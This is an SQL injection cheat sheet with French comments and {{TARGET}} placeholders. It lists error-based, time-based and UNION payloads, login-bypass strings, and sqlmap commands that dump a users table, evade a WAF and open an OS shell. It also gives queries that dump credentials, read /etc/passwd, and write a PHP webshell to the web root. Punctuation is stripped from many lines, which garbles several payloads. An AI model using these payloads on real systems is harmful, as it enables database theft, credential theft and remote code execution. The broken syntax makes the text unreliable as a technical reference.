SQL Injection

# Error-based — chercher des messages d'erreur SQL
{{TARGET}}/page.phpid1
{{TARGET}}/page.phpid1 AND 11-- 
{{TARGET}}/page.phpid1 AND 12--    # réponse différente = vulnérable
# Time-based blind (MySQL)
{{TARGET}}/page.phpid1 AND SLEEP5-- 
# UNION — trouver le nombre de colonnes
{{TARGET}}/page.phpid1 ORDER BY 3-- 
{{TARGET}}/page.phpid0 UNION SELECT 1databaseuser-- 
# Bypass login
# username: admin'--
# username: ' OR 1=1-- -

# Détection + bases de données
sqlmap -u "{{TARGET}}/page.php?id=1" --batch --dbs
# Dump table
sqlmap -u "{{TARGET}}/page.php?id=1" --batch -D mydb -T users --dump -o {{OUTPUT_DIR}}/dump.txt
# POST data
sqlmap -u "{{TARGET}}/login.php" --data="user=admin&pass=test" --batch --dbs
# Bypass WAF
sqlmap -u "{{TARGET}}/page.php?id=1" --tamper=space2comment,randomcase --level=5 --risk=3
# OS shell (si FILE priv)
sqlmap -u "{{TARGET}}/page.php?id=1" --batch --os-shell

# Lister les DBs
 UNION SELECT 1group_concatschema_name3 FROM information_schemaschemata-- 
# Tables d'une DB
 UNION SELECT 1group_concattable_name3 FROM information_schematables WHERE table_schemadatabase-- 
# Dump credentials
 UNION SELECT 1group_concatusername0x3apassword3 FROM users-- 
# Lire un fichier
' UNION SELECT 1,load_file('/etc/passwd3-- 
# Ecrire un webshell
' UNION SELECT 1,"<?php system($_GET['c']); ?>",3 INTO OUTFILE '/var/www/html/sh.php--